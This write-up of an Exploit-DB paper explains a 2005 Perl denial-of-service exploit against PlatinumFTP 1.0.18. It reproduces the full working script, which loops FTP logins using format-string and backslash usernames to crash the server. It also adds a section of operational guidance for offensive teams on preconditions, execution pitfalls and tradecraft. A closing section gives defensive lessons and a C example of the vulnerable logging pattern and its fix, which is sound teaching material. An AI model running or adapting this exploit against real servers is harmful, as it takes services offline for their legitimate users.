PlatinumFTP 1.0.18 - Remote Denial of Service (DoS) Exploitation

What this paper is
This paper describes a Perl script that exploits multiple remote Denial of Service (DoS) vulnerabilities in PlatinumFTP version 1.0.18. The script aims to crash the FTP server by sending malformed login credentials, making it unavailable to legitimate users.
Simple technical breakdown
The script works by connecting to the target PlatinumFTP server and attempting to log in with specially crafted usernames. These usernames are designed to trigger a crash in the server's handling of login requests. The script then enters a loop, repeatedly attempting to connect and log in, ensuring the server remains in a crashed state or is repeatedly crashed.
Complete code and payload walkthrough
#!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don't get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net
use strict;
use Net::FTP;
my $host;
my $username;
my $dostype;
if ($#ARGV < 1) { &syntax(); }
$host = $ARGV[0];
$dostype = $ARGV[1];
if ($dostype == '1') { $username = '\\'; }
if ($dostype == '2') { $username = '%s%s%s%s'; }
if ($dostype == '3') { $username = '%.1024d'; }
my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)
or die "can you see a ftp server? i can't.\n";
print "denial of service tpye $dostype in progress\n";
while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
$ftp->login($username);
}
print "server is down. now run forest, RUN!\n";
sub syntax {
print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";
print "DOSTYPE: 1 Using '\\' Username \n";
print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";
print "DOSTYPE: 3 Using '%.1024d' Username \n";
exit (1);
}
# milw0rm.com [2005-03-17]
Code Fragment/Block -> Practical Purpose
- #!/usr/bin/perl: Shebang line; the script is executed with the Perl interpreter.
- use strict;: Enforces stricter parsing rules in Perl, helping to catch common errors.
- use Net::FTP;: Imports the Net::FTP module, which provides functionality for interacting with FTP servers.
- my $host; my $username; my $dostype;: Declares the variables that hold the target host IP, the crafted username, and the type of DoS attempt to perform.
- if ($#ARGV < 1) { &syntax(); }: Checks that at least two command-line arguments (host and dostype) were supplied; if not, it calls the syntax() subroutine, which prints usage instructions and exits. $#ARGV is the index of the last element of the @ARGV array.
- $host = $ARGV[0];: Assigns the first command-line argument (the target IP address) to $host.
- $dostype = $ARGV[1];: Assigns the second command-line argument (the DoS type) to $dostype.
- if ($dostype == '1') { $username = '\\'; }: If dostype is 1, the username is a single backslash (\). This is likely intended to trip up path parsing or escape-character handling in the server's string processing.
- if ($dostype == '2') { $username = '%s%s%s%s'; }: If dostype is 2, the username is the format string %s%s%s%s. This triggers a format string vulnerability if the server passes the username to a printf-style function as the format, for example while logging or displaying it.
- if ($dostype == '3') { $username = '%.1024d'; }: If dostype is 3, the username is the format string %.1024d, a decimal integer conversion with a precision of 1024, which expands a single integer to at least 1024 digits. Formatting that into a fixed-size buffer is a classic way to overflow the buffer or crash the formatting code.
- my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";: Opens an initial FTP connection to the target host on port 21 with a 2-second timeout. If the connection fails, it prints an error message and exits. Debug => 0 disables debugging output from the Net::FTP module.
- print "denial of service tpye $dostype in progress\n";: Informs the user that the DoS attempt is starting.
- while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)) { ... }: This while loop is the core of the DoS mechanism. The loop condition itself opens a new FTP connection on every iteration, and the loop keeps running as long as that connection succeeds.
- my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);: Inside the loop, $ftp is redeclared and assigned a second, fresh connection with a very short timeout (0.1 seconds). This is the connection actually used for the login; the one opened by the loop condition is discarded, which makes the condition's connection somewhat redundant.
- $ftp->login($username);: Attempts to log in using the crafted $username. This is the request expected to trigger the vulnerability and crash the server.
- print "server is down. now run forest, RUN!\n";: Printed once the loop terminates, i.e. once a connection attempt fails, which the script takes to mean the server is no longer responding ("down").
- sub syntax { ... }: Defines a subroutine named syntax.
- print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";: Prints the correct command-line usage.
- print "DOSTYPE: 1 Using '\\' Username \n";: Explains DoS type 1.
- print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";: Explains DoS type 2.
- print "DOSTYPE: 3 Using '%.1024d' Username \n";: Explains DoS type 3.
- exit (1);: Exits the script with a non-zero status code, indicating an error (here, incorrect usage).
Payload/Shellcode Explanation:
There is no traditional shellcode or executable payload in this script. The "payload" is the specially crafted username string passed to the login() function. The script relies on the vulnerability within PlatinumFTP's login handling to cause a crash.
- Username \ (DoS Type 1): This might cause the FTP server to misinterpret the username as a path component or an escape character, leading to an error in its internal string processing or file system interaction.
- Username %s%s%s%s (DoS Type 2): This is a format string. If the FTP server uses a function like printf or sprintf to process the username without proper sanitization, it could lead to a crash by attempting to read from or write to arbitrary memory locations, or by consuming excessive resources.
- Username %.1024d (DoS Type 3): This is another format string. The %.1024d specifier is intended to print a decimal integer, but with a precision of 1024. This could cause a buffer overflow if the server attempts to format this string into a fixed-size buffer, or it could trigger a crash due to invalid format specifier handling or excessive memory allocation.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host on port 21 (FTP). No prior authentication or local access is required.
- Lab Preconditions:
- A target machine running PlatinumFTP version 1.0.18.
- A network path allowing the attacker's machine to reach the target's FTP port (21).
- A Perl interpreter installed on the attacker's machine.
- The Net::FTP Perl module installed.
- Tooling Assumptions:
- Perl interpreter.
- Net::FTP module (standard with most Perl installations).
- A text editor to save the script.
- A terminal or command prompt to execute the script.
- Execution Pitfalls:
- Incorrect Version: The exploit is specific to PlatinumFTP 1.0.18. Targeting other versions or FTP servers will likely fail.
- Network Issues: Firewalls blocking port 21, network latency, or packet loss can prevent the script from establishing connections or delivering the payload.
- Server Configuration: Some FTP servers might have built-in protections against malformed login attempts or might not be vulnerable to these specific string manipulations.
- Timeout Values: The script uses Timeout => 2 and Timeout => 0.1. If the server is very slow to respond, these timeouts might need adjustment. The paper itself suggests playing with the Timeout value.
- Loop Logic: The while loop's structure is a bit unusual. It establishes a connection, then immediately creates another connection with a shorter timeout, and then uses that second connection for the login. This could be a subtle way to ensure a fresh, potentially vulnerable, connection is used for the attack.
- False Positives: If the server is already unstable or under heavy load, it might crash for reasons unrelated to the script, leading to a false sense of exploit success.
- Tradecraft Considerations:
- Reconnaissance: Confirming the FTP service is running and identifying the specific version of PlatinumFTP is critical. Banner grabbing or vulnerability scanning tools can assist.
- Stealth: FTP traffic is typically unencrypted. While this script is for DoS, any network monitoring could reveal the connection attempts and malformed login data. For authorized operations, ensure proper authorization and notification procedures are followed.
- Impact Assessment: A DoS attack renders the service unavailable. Understand the business impact and operational consequences before execution.
- Testing: Always test in a controlled lab environment that mirrors the production setup as closely as possible.
Where this was used and when
- Context: This exploit targets a specific vulnerability in PlatinumFTP 1.0.18. It was likely developed and shared by security researchers to demonstrate the vulnerability.
- Timeframe: The paper was published on March 17, 2005. The exploit script itself has a modification date of May 3, 2005. Therefore, this vulnerability and exploit were relevant around 2005.
Defensive lessons for modern teams
- Patch Management: Keep FTP server software (and all other services) updated to the latest stable versions. Vulnerabilities like these are typically fixed in later releases.
- Input Validation: Applications should rigorously validate all user inputs, especially those that are processed by system functions or formatted into strings. This includes usernames, passwords, file paths, and any data received from external sources.
- Secure Coding Practices: Developers should avoid using vulnerable functions (like printf with user-supplied input) and understand the risks associated with format string vulnerabilities.
- Network Segmentation and Firewalls: Limit access to sensitive services like FTP from untrusted networks. Use firewalls to restrict access to only necessary IP addresses and ports.
- Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions can detect patterns of malformed requests or brute-force login attempts that might indicate an exploit in progress.
- Service Hardening: Configure FTP servers securely. Disable anonymous access if not needed, use strong authentication, and consider using SFTP or FTPS for encrypted transfers.
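As an added example (not code from the paper or from PlatinumFTP), the logging pattern behind this class of login-handler crash next to its fix, plus the kind of username pre-check the Input Validation and Secure Coding lessons call for; every function name here is hypothetical.

```c
/* Added example, not part of the Exploit-DB paper or of PlatinumFTP.
 * Shows the user-controlled-format logging bug behind the three payloads,
 * its fix, and a pre-check on usernames. All names are hypothetical. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Minimal log wrapper of the kind many servers carry: formats into a
 * fixed-size buffer and returns the length the full message would have. */
static int log_line(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int want = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return want;
}

/* VULNERABLE pattern: the username *is* the format string.
 * "%s%s%s%s" makes vsnprintf read pointers that were never passed
 * (crash or memory leak); "%.1024d" expands a never-passed int to 1024
 * digits, which overflows a fixed buffer when sprintf is used instead of
 * vsnprintf. Never call this with untrusted input; it is here for contrast. */
int log_login_vulnerable(char *out, size_t n, const char *user)
{
    return log_line(out, n, user);
}

/* FIXED: the format string is a literal and the username is an argument,
 * so '%' and '\\' inside the username are copied as plain data. */
int log_login_safe(char *out, size_t n, const char *user)
{
    return log_line(out, n, "USER %s", user);
}

/* Defence in depth: reject usernames carrying format directives,
 * backslashes or unreasonable length before any string handling sees them.
 * Returns 0 = acceptable, 1 = '%' directive, 2 = backslash, 3 = bad length. */
int check_username(const char *user)
{
    size_t len = strlen(user);
    if (len == 0 || len > 64) return 3;
    for (size_t i = 0; i < len; i++) {
        if (user[i] == '%') return 1;
        if (user[i] == '\\') return 2;
    }
    return 0;
}
```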
ASCII visual (if applicable)
This exploit is a direct client-to-server interaction. An ASCII visual might overcomplicate the simple request-response nature. The core interaction is:
Attacker Machine (Perl Script)
|
| 1. Connect (TCP 21)
| 2. Send USER <crafted_username>
| 3. (Server Crashes)
| 4. Repeat connection attempts
|
v
Target FTP Server (PlatinumFTP 1.0.18)
Source references
- Paper ID: 886
- Paper Title: PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Vulnerabilities
- Author: ports
- Published: 2005-03-17
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/886
- Raw URL: https://www.exploit-db.com/raw/886
- Related Discussion: http://seclists.org/lists/bugtraq/2005/Mar/0222.html